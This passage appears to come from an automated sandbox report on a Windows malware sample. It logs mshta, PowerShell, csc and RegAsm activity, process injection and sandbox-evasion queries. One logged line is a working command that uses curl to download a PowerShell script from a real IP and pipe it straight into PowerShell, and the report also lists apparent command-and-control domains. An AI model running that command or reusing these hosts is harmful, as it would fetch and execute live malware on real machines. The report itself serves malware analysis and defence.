                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: System.Windows.Forms.pdb source: powershell.exe, 00000004.00000002.4110820466.0000000070FEB000.00000020.00000001.01000000.0000000C.sdmp
                      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: powershell.exe, 00000004.00000002.4110820466.0000000070FEB000.00000020.00000001.01000000.0000000C.sdmp
                      Source: Binary string: System.Drawing.pdb source: powershell.exe, 00000004.00000002.4121706170.00000000711CB000.00000020.00000001.01000000.0000000B.sdmp
                      Source: Binary string: System.Windows.Forms.ni.pdb source: powershell.exe, 00000004.00000002.4110820466.0000000070FEB000.00000020.00000001.01000000.0000000C.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.pdb source: powershell.exe, 00000004.00000002.4107992921.000000000812B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Drawing.ni.pdb source: powershell.exe, 00000004.00000002.4121706170.00000000711CB000.00000020.00000001.01000000.0000000B.sdmp
                      Source: Binary string: q8C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.pdb source: powershell.exe, 00000004.00000002.4100255079.0000000004E0E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Drawing.ni.pdbRSDS source: powershell.exe, 00000004.00000002.4121706170.00000000711CB000.00000020.00000001.01000000.0000000B.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041ACF6 push esp; iretd 7_2_0041ACFF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00444520 push ebp; ret 7_2_00444522
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043BF00 push eax; mov dword ptr [esp], 49484716h7_2_0043BF01
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5040, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PhysicalMemory
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PhysicalMemory
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9908Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2432Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: RegAsm.exe, 00000007.00000002.4207121746.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000DB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: powershell.exe, 00000004.00000002.4107992921.000000000812B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
                      Source: curl.exe, 00000003.00000003.4069293170.000000000318D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043A9B0 LdrInitializeThunk,7_2_0043A9B0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: 4.2.powershell.exe.4e3f804.1.raw.unpack, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
                      Source: 4.2.powershell.exe.4e3f804.1.raw.unpack, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
                      Source: 4.2.powershell.exe.4e3f804.1.raw.unpack, Engineers.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.0.csJump to dropped file
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004E0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: debonairnukk.xyz
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004E0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: diffuculttan.xyz
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004E0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: effecterectz.xyz
